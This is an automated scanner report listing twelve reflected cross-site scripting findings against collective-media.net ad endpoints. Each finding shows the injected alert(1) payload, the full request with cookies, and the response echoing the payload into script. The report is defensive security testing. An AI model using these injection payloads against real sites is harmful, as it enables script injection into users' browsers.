The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain, and user input should be HTML-encoded at any point where it is copied into application responses.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://a.collective-media.net/adj/cm.quadbostonglobe/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.quadbostonglobe/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 424e5'-alert(1)-'0d82f8283ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.quadbostonglobe424e5'-alert(1)-'0d82f8283ff/;sz=160x600;ord=1311108273? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Tue, 19 Jul 2011 20:44:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:43 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.quadbostonglobe424e5'-alert(1)-'0d82f8283ff/;sz=160x600;net=cm;ord=1311108273;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.2. http://a.collective-media.net/adj/cm.quadbostonglobe/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.quadbostonglobe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 944bf'-alert(1)-'38ad345cf2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.quadbostonglobe/;sz=160x600;ord=1311108273?&944bf'-alert(1)-'38ad345cf2b=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:41 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:41 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.quadbostonglobe/;sz=160x600;net=cm;ord=1311108273?&944bf'-alert(1)-'38ad345cf2b=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/cm.quadbostonglobe/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.quadbostonglobe/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 681b5'-alert(1)-'892d1bce44a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.quadbostonglobe/;sz=160x600;ord=1311108273?681b5'-alert(1)-'892d1bce44a HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Tue, 19 Jul 2011 20:44:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:37 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.quadbostonglobe/;sz=160x600;net=cm;ord=1311108273?681b5'-alert(1)-'892d1bce44a;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 668d1'-alert(1)-'767c5f8121b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston668d1'-alert(1)-'767c5f8121b/be_bus;sz=160x600;ord=1807584008? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Tue, 19 Jul 2011 20:44:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:34 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston668d1'-alert(1)-'767c5f8121b/be_bus;sz=160x600;net=q1;ord=1807584008;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.5. http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f995'-alert(1)-'d38328d152e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_bus7f995'-alert(1)-'d38328d152e;sz=160x600;ord=1807584008? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:34 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:34 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_bus7f995'-alert(1)-'d38328d152e;sz=160x600;net=q1;ord=1807584008;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.6. http://a.collective-media.net/adj/q1.q.boston/be_bus [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff159'-alert(1)-'0f3a998551e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_bus;sz=160x600;ord=1807584008?ff159'-alert(1)-'0f3a998551e HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:29 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:29 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_bus;sz=160x600;net=q1;ord=1807584008?ff159'-alert(1)-'0f3a998551e;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.7. http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7520a'-alert(1)-'51a5e5793c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston7520a'-alert(1)-'51a5e5793c6/be_home;sz=728x90;ord=84105094? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:38 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:42:38 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston7520a'-alert(1)-'51a5e5793c6/be_home;sz=728x90;net=q1;ord=84105094;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.8. http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5e2d'-alert(1)-'6cb15244eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_homef5e2d'-alert(1)-'6cb15244eb;sz=728x90;ord=84105094? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:39 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:42:39 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_homef5e2d'-alert(1)-'6cb15244eb;sz=728x90;net=q1;ord=84105094;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.9. http://a.collective-media.net/adj/q1.q.boston/be_home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39bd4'-alert(1)-'4b3749168e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_home;sz=728x90;ord=84105094?&39bd4'-alert(1)-'4b3749168e0=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:37 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:42:37 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_home;sz=728x90;net=q1;ord=84105094?&39bd4'-alert(1)-'4b3749168e0=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.10. http://a.collective-media.net/adj/q1.q.boston/be_home [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67d6f'-alert(1)-'720b847c210 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_home;sz=728x90;ord=84105094?67d6f'-alert(1)-'720b847c210 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Tue, 19 Jul 2011 20:42:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:42:35 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_home;sz=728x90;net=q1;ord=84105094?67d6f'-alert(1)-'720b847c210;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.11. http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9740'-alert(1)-'a5134f31e3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.bostonf9740'-alert(1)-'a5134f31e3a/bus;sz=728x90;ord=386907169? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Date: Tue, 19 Jul 2011 20:44:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:05 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.bostonf9740'-alert(1)-'a5134f31e3a/bus;sz=728x90;net=q1;ord=386907169;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.12. http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5df57'-alert(1)-'4e26a563c98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/bus5df57'-alert(1)-'4e26a563c98;sz=728x90;ord=386907169? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Date: Tue, 19 Jul 2011 20:44:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:05 GMT

